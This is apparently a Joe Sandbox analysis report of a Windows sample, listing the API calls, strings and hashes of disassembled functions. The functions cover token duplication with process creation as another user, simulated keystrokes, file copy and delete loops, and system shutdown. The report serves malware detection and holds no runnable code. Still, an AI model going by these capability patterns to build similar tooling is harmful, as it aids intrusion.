                                                                                  • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                  • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                  • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 00434420
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                  • IsIconic.USER32(?), ref: 0043444F
                                                                                  • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                  • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 2889586943-2988720461
                                                                                  • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                  • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                  • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                  • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                  APIs
                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                  • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                  • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                  • _wcslen.LIBCMT ref: 00446498
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • _wcsncpy.LIBCMT ref: 004464C0
                                                                                  • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                  • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                  • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                  • CloseDesktop.USER32(?), ref: 0044657A
                                                                                  • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                  • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                  • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                  • String ID: $@OH$default$winsta0
                                                                                  • API String ID: 3324942560-3791954436
                                                                                  • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                  • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                  • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                  • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                  APIs
                                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                    • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                  • _wcscat.LIBCMT ref: 0044BD94
                                                                                  • _wcscat.LIBCMT ref: 0044BDBD
                                                                                  • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                  • _wcscpy.LIBCMT ref: 0044BE71
                                                                                  • _wcscat.LIBCMT ref: 0044BE83
                                                                                  • _wcscat.LIBCMT ref: 0044BE95
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                  • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                  • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 2188072990-1173974218
                                                                                  • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                  • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                  • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                  • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                  • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                  • __swprintf.LIBCMT ref: 004789D3
                                                                                  • __swprintf.LIBCMT ref: 00478A1D
                                                                                  • __swprintf.LIBCMT ref: 00478A4B
                                                                                  • __swprintf.LIBCMT ref: 00478A79
                                                                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                  • __swprintf.LIBCMT ref: 00478AA7
                                                                                  • __swprintf.LIBCMT ref: 00478AD5
                                                                                  • __swprintf.LIBCMT ref: 00478B03
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                  • API String ID: 999945258-2428617273
                                                                                  • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                  • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                  • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                  • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                  APIs
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                  • __wsplitpath.LIBCMT ref: 00403492
                                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                  • _wcscpy.LIBCMT ref: 004034A7
                                                                                  • _wcscat.LIBCMT ref: 004034BC
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0046E9F6,?,004285F5,?,?,?,004285F5), ref: 00403B08
                                                                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,004285F5,?,?), ref: 00403B41
                                                                                  • _wcscpy.LIBCMT ref: 004035A0
                                                                                  • _wcslen.LIBCMT ref: 00403623
                                                                                  • _wcslen.LIBCMT ref: 0040367D
                                                                                  Strings
                                                                                  • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                  • Unterminated string, xrefs: 00428348
                                                                                  • _, xrefs: 0040371C
                                                                                  • Error opening the file, xrefs: 00428231
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                  • API String ID: 3393021363-188983378
                                                                                  • Opcode ID: 06e6d0a3a078bd9bf06ef76bdf35bcbc59b35c350fa65d63fccf90350367b309
                                                                                  • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                  • Opcode Fuzzy Hash: 06e6d0a3a078bd9bf06ef76bdf35bcbc59b35c350fa65d63fccf90350367b309
                                                                                  • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                  • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                  • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                  • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                  • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1409584000-438819550
                                                                                  • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                  • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                  • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                  • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                  APIs
                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                  • __swprintf.LIBCMT ref: 00431C2E
                                                                                  • _wcslen.LIBCMT ref: 00431C3A
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                  • String ID: :$\$\??\%s
                                                                                  • API String ID: 2192556992-3457252023
                                                                                  • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                  • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                  • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                  • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                  • __swprintf.LIBCMT ref: 004722B9
                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                  • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                  • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                  • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: FolderPath$LocalTime__swprintf
                                                                                  • String ID: %.3d
                                                                                  • API String ID: 3337348382-986655627
                                                                                  • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                  • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                  • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                  • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                  • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                  • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                  • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                    • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                  • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                  • String ID: *.*
                                                                                  • API String ID: 2640511053-438819550
                                                                                  • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                  • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                  • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                  • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                  • GetLastError.KERNEL32 ref: 00433414
                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                  • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                  • String ID: SeShutdownPrivilege
                                                                                  • API String ID: 2938487562-3733053543
                                                                                  • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                  • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
